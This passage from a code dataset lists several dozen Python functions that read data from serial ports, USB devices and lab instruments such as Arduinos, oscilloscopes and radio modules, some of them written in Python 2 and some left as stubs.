"def _read(self):\n \n try:\n d = self._get_byte()\n ts = time.time()\n while d != self.HDLC_FLAG_BYTE:\n d = self._get_byte()\n ts = time.time()\n packet = [d]\n d = self._get_byte()\n if d == self.HDLC_FLAG_BYTE:\n d = self._get_byte()\n ts = time.time()\n else:\n packet.append(d)\n while d != self.HDLC_FLAG_BYTE:\n d = self._get_byte()\n packet.append(d)\n if self._debug == True:\n print \"Serial:_read: unescaped\", packet\n packet = self._unescape(packet)\n \n crc = self._crc16(0, packet[1:-3])\n packet_crc = self._decode(packet[-3:-1])\n \n if crc != packet_crc:\n print \"Warning: wrong CRC! %x != %x %s\" % (crc, packet_crc, [\"%2x\" % i for i in packet])\n if self._debug:\n if self._ts == None:\n self._ts = ts\n else:\n print \"Serial:_read: %.4f (%.4f) Recv:\" % (ts, ts - self._ts), self._format_packet(packet[1:-3])\n self._ts = ts\n return RawPacket(ts, packet[1:-3], crc == packet_crc)\n except socket.timeout:\n return None",
"def __read(self):\n if not self.__port:\n print(\"cannot perform __read() when unconnected\")\n return []\n\n buffer = bytearray()\n\n while True:\n # retrieve as much data as possible\n data = self.__port.read()\n\n # if nothing was recieved\n if not data:\n print(\"Failed to read port\")\n break\n\n buffer.extend(data)\n\n # end on chevron (ELM prompt character)\n if self.ELM_PROMPT in buffer:\n break\n\n # log, and remove the \"bytearray( ... )\" part\n print(\"read: \" + repr(buffer)[10:-1])\n\n # clean out any null characters\n buffer = re.sub(b\"\\x00\", b\"\", buffer)\n\n # remove the prompt character\n if buffer.endswith(self.ELM_PROMPT):\n buffer = buffer[:-1]\n\n # convert bytes into a standard string\n string = buffer.decode()\n\n # splits into lines while removing empty lines and trailing spaces\n lines = [ s.strip() for s in re.split(\"[\\r\\n]\", string) if bool(s) ]\n\n return lines",
"def get_data(self):\n if self.ser.in_waiting:\n data_string = self.ser.readline().decode().strip()\n if not data_string: return self.data\n self.data = [\n float(element) for element in data_string.split()\n ]\n self.ser.reset_input_buffer()\n return self.data",
"def getData(self,cmd):\n self.ser.write(cmd.encode()+END.encode())\n out = self.ser.readline()\n\n if(out == \"\"):\n raise IOError(\"communication failed\")\n return out",
"def Read_Bytes(self, size = 0):\r\n if size == 0: size = self.Port.inWaiting()\r\n data = self.Port.read(size)\r\n return data",
"def read(self, nbytes):\n utils.print_for_unimplemented_functions(SPI.read.__name__)\n telemetry_py.send_telemetry(TelemetryEvent.MICROBIT_API_SPI)",
"def _read_v2(self):\n return self.usb_dev.read(self.ep_in, self.rdbuf_chunksize, self.usb_rd_timeout)",
"def receive(serial_port, timeout=None):\n raw_message = serial_port.readline()\n\n debug and print(\"client:\", raw_message, \":\")\n\n message = raw_message.decode('ascii')\n\n return message.rstrip(\"\\n\\r\")",
"def _get_data(self, read_size):\n return self._character_device.read(read_size)",
"def recive_data(self):\n # read all available data\n while self.ser.inWaiting() > self.INPUT_DATA_SIZE+1:\n data = array.array('c')\n # search the header\n data.append(self.ser.read(1))\n while data[0] != chr(1):\n data[0] = self.ser.read(1)\n \n # wait for all available data\n while self.ser.inWaiting() < (self.INPUT_DATA_SIZE-1):\n time.sleep(0.03);\n \n # recives data\n data = self.ser.read(self.INPUT_DATA_SIZE-1)\n \n # prove if you want graphical data\n if self.pushButton_monitor.isChecked():\n # decodes the data\n t = struct.unpack('I', data[3]+data[2]+data[1]+data[0])\n r = struct.unpack('f', data[4]+data[5]+data[6]+data[7])\n x0 = struct.unpack('f', data[8]+data[9]+data[10]+data[11])\n x1 = struct.unpack('f', data[12]+data[13]+data[14]+data[15])\n u = struct.unpack('f', data[16]+data[17]+data[18]+data[19])\n \n self.time = t[0]*25e-9\n \n # prepare the string output\n aux_str = \" t = \"+str(self.time)+\"\\t\"\n aux_str += \" r = \"+str(r[0])+\"\\t\"\n aux_str += \" u = \"+str(u[0])+\"\\t\"\n aux_str += \" x1 = \"+str(x1[0])+\"\\t\"\n aux_str += \" x0 = \"+str(x0[0])+\"\\n\"\n # print string output\n self.textBrowser.insertPlainText(aux_str)\n \n # append data to the arrays\n self.graf_t.append(self.time)\n self.graf_r.append(r[0])\n self.graf_x0.append(x0[0])\n self.graf_x1.append(x1[0])\n self.graf_u.append(u[0])\n \n # remove one value if the arrays have maximum length\n if self.graf_t.buffer_info()[1] >= NUM_SAMPLES:\n self.graf_t.pop(0)\n self.graf_r.pop(0)\n self.graf_x0.pop(0)\n self.graf_x1.pop(0)\n self.graf_u.pop(0)\n \n # reload number of samples lavel\n self.label_samples_value.setText(str(self.graf_t.buffer_info()[1]))\n # reload number of waiting chars in serial rx buffer\n self.label_rx_buff_value.setText(str(self.ser.inWaiting()))\n\n # reload mutex area\n self.updated_data = 1\n \n # prove if there are available id's\n if (self.actionPC_Monitor.isChecked() and data[20] == chr(2)):\n # if it is true, looks how much id's\n i = struct.unpack('B', data[21])\n\n if i[0] < STACK_SIZE:\n for z in range(i[0]):\n new_device = struct.unpack('B', data[z+22])\n new_string = str(new_device[0])\n \n llista = self.listWidget_link.findItems(new_string, QtCore.Qt.MatchExactly)\n if len(llista) == 0:\n self.listWidget_link.addItem(new_string)",
"def doRead(self):\n return fdesc.readFromFD(self.fileno(), self.protocol.dataReceived)",
"def read(self, wait_sleep=0.3) -> bytes:\n # return everything currently in device buffer i.e. may be incomplete so wait a bit before read\n time.sleep(wait_sleep)\n # in pyserial==3.5 method added .read_all()\n # Read all bytes currently available in the buffer of the OS.\n # BUT... not available in pyserial==3.4\n # ADDITIONALLY, https://pyserial.readthedocs.io/en/latest/index.html says latest yet refers to 3.4\n # SO... lets make this requirement 3.4 and manually implement read_all()\n if hasattr(self._con, \"read_all\"):\n logger.debug(f\"read_all\")\n return self._con.read_all()\n else:\n # in_waiting - Return the number of bytes currently in the input buffer.\n logger.debug(f\"read(in_waiting)\")\n return self._con.read(self._con.in_waiting)",
"def readData(self):\n if (self.model == 'GDS'):\n self.write(':ACQ'+str(ch)+':MEM?\\n')\n elif (self.model == 'TDS'):\n self.write('CURVe?\\n')\n\n # Check for the initial '#'; if not present, raise error.\n if (self.read(1) != '#'):\n raise Exception, \"Expected header not present\"\n\n # Read the data length indicator\n dataSize = int(self.read(int(self.read(1))))\n\n # extra steps for GDS\n if (self.model == 'GDS'):\n # subtract the 8 bytes we will read.\n dataSize -= 8\n # Read the sampling period\n hstep = struct.unpack('>f', self.read(4))[0]\n # also, fix hoff so it corresponds with that for TDS\n # FIXME: check with the scope at some point.\n hoff = hoff - float(dataSize/4) * hstep\n # Read 4 bytes to advance to the actual data: first byte\n # contains the channel and the three are not used,\n # according to the GDS800 manual.\n self.read(4)\n \n # Read data; TDS expects a 1-byte data, GDS expects 2-byte one.\n if (self.model == 'TDS'):\n data = list(struct.unpack('>'+str(dataSize)+'b',\n self.read(dataSize)))\n # TDS has a trailing '\\n' that should be drained.\n self.read(1)\n elif (self.model == 'GDS'):\n data = list(struct.unpack('>'+str(dataSize/2)+'h',\n self.read(dataSize)))\n\n return data",
"def __get_response(serial_port):\n read_data = \"\"\n while not read_data.endswith(\"\\n>> \"):\n ready = select.select([serial_port], [], [], 25)[0]\n if ready:\n read_data += serial_port.read(serial_port.inWaiting()).decode(\n \"utf-8\", \"replace\")\n else:\n raise errors.DeviceError(\n \"Device cambrionix get response failed. \"\n \"Read timeout on serial port: {}\".format(serial_port))\n\n return read_data.splitlines()",
"def _read_arduino(self) -> np.ndarray:\r\n raw_data: bytes = self._serial_handle.read(self._chunk)\r\n int_data = [int(data_bit) for data_bit in raw_data]\r\n return np.array(int_data)",
"def receive_data():\n\n while True:\n try:\n bytes_to_read = ser.readline()\n print(bytes_to_read)\n data = json.loads(bytes_to_read.decode('utf-8'))\n distance = data['distance']\n print(f'distance: {distance}')\n except Exception as e:\n print(f'Error in reading bytes from the \\'duino: {e}')",
"def reader(self):\n try:\n line = ''\n while self.alive:\n data = self.serial.read(1)\n if data == '\\r':\n continue\n\n line += data\n if data == '\\n':\n self.log.print_distant(datetime.now().strftime(\n \"%d/%m/%Y %H:%M:%S> \"))\n if line.startswith('ALARM:'):\n self.log.alert(line)\n elif line.startswith('EVENT:') or line.startswith('INFO'):\n self.log.warn(line)\n else:\n self.log.print_distant(line)\n self.parse(line.strip())\n line = ''\n\n sys.stdout.flush()\n\n except serial.SerialException:\n self.alive = False\n # would be nice if the console reader could be interruptted at this\n # point...\n raise",
"def receive (self):\r\n\t\t# Ensure serial port is open\r\n\t\tif not self.serial_port.is_open:\r\n\t\t\tself.serial_port.open()\r\n\t\t\r\n\t\t# Read from port\r\n\t\tlines = []\r\n\t\terrs = []\r\n\t\t\r\n\t\t# Check if there's anything in the input buffer\r\n\t\twhile self.serial_port.in_waiting > 0:\r\n\t\t\t# Get a line from the receive buffer\r\n\t\t\trcv = self.serial_port.readline()\r\n\t\t\ttry:\r\n\t\t\t\tline = str(rcv.decode('ascii'))\r\n\t\t\texcept UnicodeDecodeError as e:\r\n\t\t\t\traise RuntimeError(\"unexpected characters in Qontroller return value. Received line '{:}'.\".format(rcv) )\r\n\t\t\t\r\n\t\t\t# Check if it's an error by parsing it\r\n\t\t\terr = self.parse_error(line)\r\n\t\t\tif err is None:\r\n\t\t\t\t# No error, keep the line\r\n\t\t\t\tlines.append(line)\r\n\t\t\telse:\r\n\t\t\t\t# Line represents an error, add to list\r\n\t\t\t\terrs.append(err)\r\n\t\t\r\n\t\t# Log the lines we received\r\n\t\tif len(lines):\r\n\t\t\tself.log_append(type='rcv', id='', ch='', desc=lines, raw='')\r\n\t\t\r\n\t\t# Add any errors we found to our log\r\n\t\tfor err in errs:\r\n\t\t\tself.log_append(type='err', id=err['id'], ch=err['ch'], desc=err['desc'], raw=err['raw'])\r\n\t\t\r\n\t\treturn (lines, errs)",
"def __reader(self):\n empty = bytes()\n\n try:\n while not self._wantExit:\n # logging.debug(\"reading character\")\n b = self._readBytes(1)\n # logging.debug(\"In reader loop\")\n if len(b) > 0:\n # logging.debug(f\"read returned {b}\")\n c = b[0]\n ptr = len(self._rxBuf)\n\n # Assume we want to append this byte, fixme use bytearray instead\n self._rxBuf = self._rxBuf + b\n\n if ptr == 0: # looking for START1\n if c != START1:\n self._rxBuf = empty # failed to find start\n if self.debugOut != None:\n try:\n self.debugOut.write(b.decode(\"utf-8\"))\n except:\n self.debugOut.write('?')\n\n elif ptr == 1: # looking for START2\n if c != START2:\n self._rxBuf = empty # failed to find start2\n elif ptr >= HEADER_LEN: # we've at least got a header\n # big endian length follos header\n packetlen = (self._rxBuf[2] << 8) + self._rxBuf[3]\n\n if ptr == HEADER_LEN: # we _just_ finished reading the header, validate length\n if packetlen > MAX_TO_FROM_RADIO_SIZE:\n self._rxBuf = empty # length ws out out bounds, restart\n\n if len(self._rxBuf) != 0 and ptr + 1 == packetlen + HEADER_LEN:\n try:\n self._handleFromRadio(self._rxBuf[HEADER_LEN:])\n except Exception as ex:\n logging.error(\n f\"Error while handling message from radio {ex}\")\n traceback.print_exc()\n self._rxBuf = empty\n else:\n # logging.debug(f\"timeout\")\n pass\n except serial.SerialException as ex:\n if not self._wantExit: # We might intentionally get an exception during shutdown\n logging.warn(f\"Meshtastic serial port disconnected, disconnecting... {ex}\")\n except OSError as ex:\n if not self._wantExit: # We might intentionally get an exception during shutdown\n logging.error(f\"Unexpected OSError, terminating meshtastic reader... {ex}\") \n except Exception as ex:\n logging.error(f\"Unexpected exception, terminating meshtastic reader... {ex}\")\n finally:\n logging.debug(\"reader is exiting\")\n self._disconnected()",
"def read(self) -> bytes:\n line = self.device.readline()\n if len(line) > 0 and line[-1] == 10:\n line += self.device.readline()\n return line",
"def ReadSerial():\n return _ReadNumericFile(pathutils.JOB_QUEUE_SERIAL_FILE)",
"def read_data(self):\n raise NotImplementedError",
"def read(self, count):\n # TIMEOUT: Since read is called in a loop, wait for self.timeout period before\n # calling serial.read(). See comment on serial.Serial() call above about\n # timeout.\n time.sleep(self.read_timeout)\n c = str()\n try:\n if self.serial:\n c = self.serial.read(count)\n except SerialException as e:\n self.serial = None\n self.LAST_ERROR = \"connection lost, serial.read(%d): %s\" % (count, str(e))\n self.logger.prn_err(str(e))\n return c",
"def getData(self):\n self.ser.write(b'g')\n readString = self.ser.readline()\n print(readString)\n readString = readString.decode(\"utf-8\")\n splittedString = readString.split('\\t')\n for i, num in enumerate(splittedString):\n try:\n splittedString[i] = int(float(num))\n except ValueError:\n pass\n self.accString.set('Accleration\\nX: %.5f\\nY: %.5f\\nZ: %.5f' %\n (splittedString[0], splittedString[1],\n splittedString[2]))\n self.logFile.write(readString)\n self.comJob = root.after(10, self.getData)",
"def read_drt(self):\n data = Array('B')\n data = self.read(0, 0, 8)\n num_of_devices = drt_controller.get_number_of_devices(data)\n len_to_read = num_of_devices * 8\n\n data = self.read(0, 0, len_to_read + 8)\n self.drt_manager.set_drt(data)",
"def getUARTFrameReady():\r\n serialRead()\r\n serialRead()",
"def read(self, delay, cmd):\n \n buf = []\n seeking_sync = True;\n seeking_end = True;\n\n time.sleep(delay)\n # Read serial into buffer and then pop out to s for return\n while self.ser.inWaiting() > 0:\n ch = self.ser.read(1) #Read 1 BYTE\n \n if seeking_sync:\n if ch == chr(2): # <STX>\n seeking_sync = False\n elif seeking_end:\n if ch == chr(6): # <ACK>\n buf.append(chr(6))\n seeking_end = False\n else:\n buf.append(ch)\n \n ### These checks should be moved to send like the other serial classes\n if not buf: # No reply received\n debugRow = 'arduinoSerial:: Sent_Cmd: ' + cmd + ' No reply!'\n self.dbF.writerow([debugRow])\n if DEBUG: print debugRow\n return False\n elif buf[-1] != chr(6): # Check for ACK character\n debugRow = 'arduinoSerial:: Sent_Cmd: ' + cmd + ' ACK not found!'\n self.dbF.writerow([debugRow])\n if DEBUG: print debugRow\n return False \n else:\n cmd = buf[0] # First entry is command\n # Comma separated data stored in list\n data = ''.join(buf[1:-1]).split(',') \n return cmd, data",
"def receive_command(self):\n if self.serial.is_open:\n return self.serial.read(999).decode('utf-8')\n self.serial.flush()",
"def serial_handler(self):\n hdr = self.serial.read(2)\n if hdr is None:\n print('tried to handle empty serial message queue')\n elif len(hdr) == 2 and hdr[1] == int('fc', 16):\n rx = self.serial.read(6)\n (u, c, d) = self.pkt.unpack(rx)\n #write the data to file here\n self.f.write(\"{0}\\t{1}\\t{2}\\n\".format(u, c, d))\n elif len(hdr) == 2 and hdr[1] == int('fd', 16):\n print('rx heartbeat message')\n else:\n print(\"unknown header: {0}\".format(hdr))\n self.serial.flushInput()\n # msg = self.serial.read(8)\n # self.f.write(\"{0}\\t{1}\\t{2}\\t{3}\\n\".format(*self.pkt.unpack(msg)))",
"def request_arduino_data(self):\n\n # Send a command to request arduino data\n with self.lock:\n self.ser.write(self.ARD_RETURNALL)",
"def readData(self):\n self._readHeader()\n self._readSize()\n self._readComments()\n self._readAllROI()\n self._readDate()\n self._readArray()",
"def ll_uart_read(self,length):\r\n data=''\r\n time_begin = time.time()\r\n while True:\r\n #time_cnt = time.time() - time_begin\r\n # if int(time_cnt) >= self._ll_rx_timeout:\r\n # print(time_cnt)\r\n # print(len(data))\r\n # return ''\r\n \r\n if not self._uart_rx_queue.empty():\r\n #with self._rx_lock:\r\n data += self._uart_rx_queue.get(1)\r\n #self.log.debug(\"[RECV]:\"+ str(data))\r\n else:\r\n # time.sleep(0.01)\r\n # time_cnt = time_cnt + 0.01\r\n pass\r\n\r\n if len(data) == length:\r\n print(time.time()-time_begin)\r\n return data",
"def _readline(self):\n return self.ser.readline().decode(\"ASCII\").strip()",
"def read_serial(self, num_expected):\n\n\t\ttotal_received = 0\n\t\tread_chars = \"\"\t\n\t\n\t\twhile total_received < num_expected:\n\t\t\tiw = self.ser.inWaiting()\n\n\t\t\tif iw > num_expected:\n\t\t\t\tiw = num_expected\n\t\t\tread_chars = read_chars + self.ser.read(iw)\n\t\t\ttotal_received += iw\n\t\t\ttime.sleep(0.001)\n\t\treturn read_chars",
"def readCommand(self):\n while (True):\n time.sleep(1)\n # At least a package of 4 bytes (minimum)\n # [ Head | Length | Address | Data[0…N] | Check ]\n if (self._serial.inWaiting()>=4):\n # Gets only the first byte of the packet (it should be HEAD)\n packet_header = self._serial.read(1)\n if (packet_header != Ind903Packet.PACKET_HEAD):\n # the next one is the length of the packet\n packet_length_bytes = self._serial.read(1)\n packet_length = int.from_bytes(packet_length_bytes, byteorder='big')\n if (packet_length > 0):\n raw_packet = b\"\".join([packet_header, packet_length_bytes, self._serial.read(packet_length)]) \n result_packet = Ind903Packet.parsePacket(raw_packet)\n return (result_packet)",
"def read(self, delay):\n \n buf = []\n seeking_sync = True;\n seeking_end = True;\n \n time.sleep(delay)\n # Read serial into buffer and then pop out to s for return\n while self.ser.inWaiting() > 0:\n ch = self.ser.read(1) #Read 1 BYTE\n\n if seeking_sync:\n if ch == self.stx: # <STX>\n seeking_sync = False\n elif seeking_end:\n if ch == self.ack: # <ACK>\n buf.append(self.ack)\n seeking_end = False\n else:\n buf.append(ch)\n \n \n if not buf: # No reply received\n return False\n elif buf[-1] != self.ack: # Check for ACK character\n return False \n else:\n return ''.join(buf[:-1])",
"def serial_read(user_gpio):\n bytes = _u2i(_pigpio_command(_control, _PI_CMD_SLR, user_gpio, 10000))\n if bytes > 0:\n buf = \"\"\n while len(buf) < bytes: buf += _control.recv(bytes-len(buf))\n return bytes, buf\n return bytes, \"\"",
"def read():\n # TODO",
"def readSerial():\n global emergState\n global responseQueue\n global emergSem\n global serSem\n global respSem\n \n while True:\n emergSem.acquire()\n temp = emergState\n emergSem.release()\n if not temp:\n respSem.acquire()\n temp = responseQueue\n respSem.release()\n if len(temp) > 0:\n string = temp[0]\n temp = temp[1:]\n return string\n else:\n return False\n time.sleep(0.2)\n return False",
"def _read_cardiochip(self):\n cur_leadstatus = 0\n sample_count =0\n while self.connected:\n sample_count+=1\n #check for sync bytes\n readbyte = ord(self.ser.read(1))\n #print readbyte, SYNC_BYTE\n if readbyte != SYNC_BYTE:\n continue\n readbyte = ord(self.ser.read(1))\n if readbyte != SYNC_BYTE:\n continue\n\n #parse length byte\n while True:\n pLength = ord(self.ser.read(1))\n if pLength != SYNC_BYTE:\n break\n if pLength > 169:\n continue\n #print \"L: %i\" % pLength\n\n # collect payload bytes\n payload = self.ser.read(pLength)\n payload = [ord(x) for x in payload] #convert to int from string\n #print \"payload: \" + str(payload).strip('[]')\n # ones complement inverse of 8-bit payload sum\n checksum = sum(payload) & 0xFF\n checksum = ~checksum & 0xFF\n\n # catch and verify checksum byte\n chk = ord(self.ser.read(1))\n #print \"chk: \" + str(checksum)\n if chk != checksum:\n print \"checksum error, %i != %i\" % (chk, checksum)\n continue\n\n output = self._parseData(payload)\n\n lead_status = next(( d for d in output if 'leadoff' in d), None)\n if lead_status is not None:\n if cur_leadstatus != lead_status['leadoff']:\n #we have a change\n if lead_status['leadoff']==200:\n print \"LEAD ON\"\n elif lead_status['leadoff']==0:\n print \"LEAD OFF\"\n cur_leadstatus = lead_status['leadoff']\n\n # store the output data in a queue\n # first, create a tuple with the sample index and dict with the timestamp and ecg\n ecgdict = next(((i,d) for i,d in enumerate(output) if 'ecg_raw' in d), None)\n if ecgdict is not None and sample_count>self.Fs*2:\n #let's just ignore the first 2 seconds of crappy data\n ecgdict[1]['leadoff'] = cur_leadstatus\n #print ecgdict[1]\n self.ecg_buffer.put(ecgdict[1]) # this should save the ecg and timestamp keys\n\n return",
"def async_read(self):\n self.lock.acquire()\n\n # append data\n self.rx_buffer += self.interface.read()\n\n # ensure first byte start with 0xbc\n if len(self.rx_buffer) > 0:\n if self.rx_buffer[0] != 0xbc:\n try:\n pkt_start = self.rx_buffer.index(0xbc)\n self.rx_buffer = self.rx_buffer[pkt_start:]\n except ValueError:\n self.rx_buffer = bytes()\n\n # check if we got a valid packet\n if len(self.rx_buffer) >= 4:\n pkt_size = unpack('<H', self.rx_buffer[2:4])[0]\n # check if we got a complete packet\n if len(self.rx_buffer) >= (pkt_size + 5):\n # yep, parse this packet\n packet = Packet.fromBytes(self.rx_buffer[:pkt_size+5])\n self.rx_buffer = self.rx_buffer[pkt_size+5:]\n self.lock.release()\n return packet\n\n # otherwise, return None\n self.lock.release()\n return None",
"def _receive(self, length):\n \n return self.device.read(length)",
"def read_data(self, size, attempts = 1):\n data = Array('B')\n # do we have all of the data in the read buffer?\n if size <= len(self.rdbuf) - self.rdofs:\n data = self.rdbuf[self.rdofs : self.rdofs + size]\n self.rdofs += size\n return data\n # do we have some of the data in the read buffer?\n if len(self.rdbuf) - self.rdofs > 0:\n data = self.rdbuf[self.rdofs:]\n # do a usb read to get the rest...\n # read from the usb device\n try:\n bytes_to_rd = size - len(data)\n while bytes_to_rd > 0:\n # read from the usb device\n while True:\n self.rdbuf = self._read()\n self.rdofs = 0\n if len(self.rdbuf) > 0:\n break\n else:\n # no data received\n attempts -= 1\n if attempts > 0:\n # try again\n continue\n # return what we have\n return data\n # copy the read buffer into the returned data\n n = len(self.rdbuf)\n if n >= bytes_to_rd:\n # copy a partial read buffer\n data += self.rdbuf[:bytes_to_rd]\n self.rdofs = bytes_to_rd\n return data\n else:\n # copy all of the read buffer\n data += self.rdbuf\n bytes_to_rd -= n\n # read more data...\n except usb.core.USBError as e:\n raise usbdev_error(str(e))\n # never reached\n raise usbdev_error(\"internal error\")",
"def read(self,count=None, ser = None):\n from time import time\n ##debug(\"read count=%r,ser=%r\" % (count,ser))\n if ser is None:\n ser = self.ser\n if ser is not None:\n #print(\"in wait:\" + str(self.ser.inWaiting()))\n debug(\"Trying to read %r bytes from %s...\" % (count,ser.name))\n ser.timeout = self.timeout\n reply = ser.read(count)\n debug(\"%s: Read %r\" % (ser.name,reply))\n self.last_reply_time = time()\n else: reply = \"\"\n return reply",
"def _reader(self):\n while self._alive:\n self._paused = False\n if self._interface:\n self._interface.serial_resumed()\n time.sleep(4)\n self._paused = True\n if self._interface:\n self._interface.serial_paused()\n time.sleep(2)",
"def __recv__(self):\n data = self.port.read(size=1)\n v = int.from_bytes(data, byteorder=\"little\")\n if(self.verbose):\n pc.color_stdout(\"RED\")\n print(\"<< %s\\t - %s\\t - %d\"% (hex(v),bin(v),v))\n pc.color_stdout(\"RESET\")\n return data",
"def dataReceived( self, data ):\n # if self.log.isEnabledFor(logging.DEBUG):\n # self.log.debug(\"Received data [%s]\" % _safelylogOutPdu(data))\n \n self.recvBuffer = self.recvBuffer + data\n \n while True:\n if self.connectionCorrupted:\n return\n msg = self.readMessage()\n if msg is None:\n break\n self.endPDURead()\n self.rawMessageReceived(msg)\n \n if len(self.recvBuffer) > 0:\n self.incompletePDURead()",
"def get_data(self):\n try:\n data_string = self.ser.readline().decode()\n except UnicodeDecodeError as e:\n return self.get_data()\n \n if not data_string: # check for empty string\n return self.get_data()\n \n if data_string[0] == '|' and data_string[-1] == '\\n' and\\\n self.reset_confirmed:\n # if the data_string is valid, process it\n try:\n data_string = data_string.strip() \n data = data_string.split(',')\n assert len(data) == 7, \"Bad data Length\" \n data = [float(val) for val in data[1:]]\n data[0] /= 1000\n if self.ser.in_waiting: self.ser.reset_input_buffer()\n return data\n except (AssertionError, ValueError) as e:\n print(\"Error:\", type(e), e)\n if self.ser.in_waiting: self.ser.reset_input_buffer()\n return self.get_data()\n\n\n elif data_string[0] == '+' and data_string[-1] == '\\n' and\\\n self.reset_confirmed:\n # if the data_string is a valid time stamp, process it\n # self.system_timestamp = \"\\nSystem start time is: \"\\\n # \"%s\" % strftime(\"%Y/%m/%d %H:%M:%S\", localtime())\n self.arduino_timestamp = data_string.strip()\n print(self.arduino_timestamp)\n return self.get_data()\n \n elif data_string[0] == '/' and data_string[-1] == '\\n':\n # if string begins with / then it is a debug message and should\n # just be returned\n if \"setup finished\" in data_string.lower(): \n self.reset_confirmed = True\n print(data_string.strip())\n return self.get_data()\n else:\n # if the data_string is invalid try again\n return self.get_data()",
"def read(self, n=1):\n s = self._RX_buf[0:n]\n self._RX_buf = self._RX_buf[n:]\n # print(\"read op occurred: RX_buf = {}\".format(self._RX_buf), end='\\n\\n')\n return s # bytes(s, encoding='ascii')",
"def servo_read_all(self):\n msg = b'\\x25\\x00'\n parameter_len = 16\n ans = self.__bt.read(msg, parameter_len)\n if ans is not None:\n return [x for x in ans]\n return None",
"def pub_serial_read():\n pub = rospy.Publisher('serial_reader', String, queue_size=10)\n while not rospy.is_shutdown():\n recv=serial_read(useParse=True)\n if recv != '':\n rospy.loginfo(recv)\n pub.publish(recv)\n else:\n pass\n print 'Closing...'",
"def serial_read(self, size):\n line=''\n # How many chars in the buffer\n actualsize = len(self.buffer)\n # maximal the avialable chars\n if size > actualsize:\n size = actualsize\n linebuf = self.buffer[:size]\n self.buffer = self.buffer[size:]\n for c in linebuf:\n line += chr(c)\n return line",
"def get_data(self):\n return read_sensor(bus=self.bus,\n address=self.address)",
"def read_live_data(wearable_port):\r\n IMU1_num = []\r\n IMU2_num = []\r\n IMU3_num = []\r\n\r\n try:\r\n wearable = serial.Serial(wearable_port, baudrate=115200, timeout=5)\r\n #arduino = serial.Serial(arduino_port, timeout=1)\r\n # Delay for 2 seconds to wait for serial port to be ready.\r\n print(\"Waiting 2 seconds for serial to be ready.\")\r\n time.sleep(2)\r\n except Exception as e:\r\n print(e)\r\n print('Please check the port')\r\n return\r\n\r\n input(\"Press Enter to continue...\")\r\n str(wearable.write(bytes(33)))\r\n # Open file to store the data; filename includes date and time; format: data-YYYYMMDDHHmmss.csv\r\n filename = \"data-\" + str(dt.datetime.now().strftime(\"%Y%m%d%H%M%S\")) + \".csv\"\r\n filenamplot = \"plot-\" + str(dt.datetime.now().strftime(\"%Y%m%d%H%M%S\")) + \".png\"\r\n print(\"Opening %s\" % filename)\r\n f = open(filename, \"a+\")\r\n # f.write(\"power,rpm\\n\")\r\n count = 1000\r\n # Get data and continuously yield Power and RPM as integers\r\n\r\n while (count >0):\r\n count = count -1\r\n #if arduino.in_waiting > 0:\r\n wearable.flushInput()\r\n\r\n '''\r\n arduino_output = arduino.readline().decode(\"utf_8\", \"strict\")\r\n print(\"Distance: %s\" % arduino_output)\r\n f.writelines(\"%s\" % arduino_output)\r\n if arduino_output == \"Hard Stop\\r\\n\":\r\n break\r\n arduino_output = arduino_output.replace(\"\\r\\n\", \"\")\r\n Distance.append(int(float(arduino_output)))\r\n '''\r\n\r\n try:\r\n data = wearable.readline().decode(\"utf_8\", \"strict\")\r\n data = data.replace(\"\\r\\n\", \"\\n\").split()\r\n IMU1= data[2].replace(\"\\n\", \"\")\r\n IMU1_num.append(int(IMU1))\r\n IMU2 = data[3].replace(\"\\n\", \"\")\r\n IMU2_num.append(int(IMU2))\r\n IMU3 = data[4].replace(\"\\n\", \"\")\r\n IMU3_num.append(int(IMU3))\r\n print(\"IMU1: %s\\t IMU2: %s\\t IMU3: %s\\t\" % (IMU1, IMU2, IMU3))\r\n f.writelines(\"%s,%s,%s,%s\\n\" % (IMU1, IMU2, IMU3))\r\n yield int(IMU1), int(IMU2), int(IMU3)\r\n except Exception as e:\r\n print('error')\r\n f.writelines(\"Error\\n\")\r\n\r\n print('Program ended.')\r\n t = numpy.linspace(1, len(IMU1_num), len(IMU1_num))\r\n fig, (ax1) = plt.subplots(nrows=1, ncols=1, figsize=(16.0, 9.0)) # create figure & 1 axis\r\n ax1.plot(t, IMU1_num, t, IMU2_num,t, IMU3_num)\r\n ax1.set_title('IMU')\r\n ax1.legend(('IMU1', 'IMU2', 'IMU3'))\r\n # manager = plt.get_current_fig_manager()\r\n # manager.resize(*manager.window.maxsize())\r\n fig.savefig(filenamplot)\r\n plt.show()\r\n\r\n f.close()\r\n #arduino.close()\r\n wearable.close()",
"def get_readings(self):\n buf = self._read(0x020001)\n data = decode(buf[1:])\n return data",
"def _readline(self):\n\n eol = b'\\r'\n leneol = len(eol)\n line = bytearray()\n while True:\n c = self.ser.read(1)\n if c:\n line += c\n if line[-leneol:] == eol:\n break\n else:\n break\n return bytes(line)",
"def _read(self, register):\n\n addr, num_bytes = register\n data = response = error = None\n if num_bytes == 1:\n data, response, error = self.packet_handler.read1ByteTxRx(\n self.port_handler, self._id, addr\n )\n elif num_bytes == 2:\n data, response, error = self.packet_handler.read2ByteTxRx(\n self.port_handler, self._id, addr\n )\n else:\n data, response, error = self.packet_handler.read4ByteTxRx(\n self.port_handler, self._id, addr\n )\n\n # Check response\n self._error_handler(response, error)\n\n return data",
"def _read(self):\n # because protocol has no termination chars the read reads the number\n # of bytes in the buffer\n bytes_in_buffer = self.visa_handle.bytes_in_buffer\n # a workaround for a timeout error in the pyvsia read_raw() function\n with(self.visa_handle.ignore_warning(visa.constants.VI_SUCCESS_MAX_CNT)):\n mes = self.visa_handle.visalib.read(\n self.visa_handle.session, bytes_in_buffer)\n mes = str(mes[0].decode()) # cannot be done on same line for some reason\n # if mes[1] != 0:\n # # see protocol descriptor for error codes\n # raise Exception('IVVI rack exception \"%s\"' % mes[1])\n return mes",
"def readAndRespond(self):\n\n if self.ser.isOpen():\n try:\n #Try to read\n self.ser.flushOutput()\n response = self.ser.readline()\n self.parseString(response)\n print response\n #if response.strip() == \"up\":\n # self.moveArmUp()\n # print \"Moving Up!\"\n #elif response.strip() == \"down\":\n # self.moveArmDown()\n # print \"Moving Down!\"\n except Exception, e:\n print \"Error: \" + str(e)",
